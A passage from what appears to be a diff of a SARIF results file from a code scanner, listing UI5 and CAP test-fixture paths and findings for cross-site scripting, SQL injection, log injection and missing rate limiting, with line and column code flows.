"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 368 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 369 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 370 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 371 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 372 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 373 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 374 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 376 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 377 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 378 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 379 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 380 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 381 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 383 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 384 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 385 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 386 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 388 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 389 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 390 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 391 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 392 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 394 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 395 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 396 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 397 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 399 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 400 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 401 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 402 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 404 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 405 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 406 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 408 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 409 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 410 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + } + }, { + "location" : { + "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 412 + } + }, { + "location" : { + "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 413 + } + }, { + "location" : { + "uri" : "qlt.conf.json", + "uriBaseId" : "%SRCROOT%", + "index" : 414 + } + }, { + "location" : { + "uri" : "scripts/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 415 + } + }, { + "location" : { + "uri" : "scripts/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 416 + } + } ], + "results" : [ { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 4, + "startColumn" : 20, + "endColumn" : 25 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "6311a9ed7e4091a4:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 4, + "startColumn" : 20, + "endColumn" : 25 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 4, + "startColumn" : 20, + "endColumn" : 25 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 11, + "startColumn" : 20, + "endColumn" : 25 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "8e517fc6fdf32a1a:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 11, + "startColumn" : 20, + "endColumn" : 25 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 19, + "startColumn" : 20, + "endColumn" : 26 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "c51cf11a085c01f4:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 19, + "startColumn" : 20, + "endColumn" : 26 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 27, + "startColumn" : 20, + "endColumn" : 26 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e309bf8540256a05:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 25, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 25, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 26, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 26, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 26, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 27, + "startColumn" : 20, + "endColumn" : 26 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 25, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/missing-rate-limiting", + "rule" : { + "id" : "js/missing-rate-limiting", + "index" : 68, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "This route handler performs [a database access](1), but is not rate-limited." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 40, + "startColumn" : 25, + "endLine" : 44, + "endColumn" : 8 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "ac6d3bdd3d52ea9b:1", + "primaryLocationStartColumnFingerprint" : "18" + }, + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 9, + "endLine" : 43, + "endColumn" : 11 + } + }, + "message" : { + "text" : "a database access" + } + } ] + }, { + "ruleId" : "js/sql-injection", + "rule" : { + "id" : "js/sql-injection", + "index" : 78, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "This query string depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "4fc3122b51f477a1:1", + "primaryLocationStartColumnFingerprint" : "11" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 26, + "startColumn" : 19, + "endColumn" : 36 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "ccc6f77c65eccb45:1", + "primaryLocationStartColumnFingerprint" : "12" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 54 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 26, + "startColumn" : 32, + "endColumn" : 36 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 26, + "startColumn" : 19, + "endColumn" : 36 + } + }, + "message" : { + "text" : "\"console:\" + book" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 7, + "startColumn" : 18, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "be9a18716e55d497:1", + "primaryLocationStartColumnFingerprint" : "13" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 7, + "startColumn" : 18, + "endColumn" : 41 + } + }, + "message" : { + "text" : "`[INFO] ... value}`" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 15, + "startColumn" : 18, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "be9a18716e55d497:2", + "primaryLocationStartColumnFingerprint" 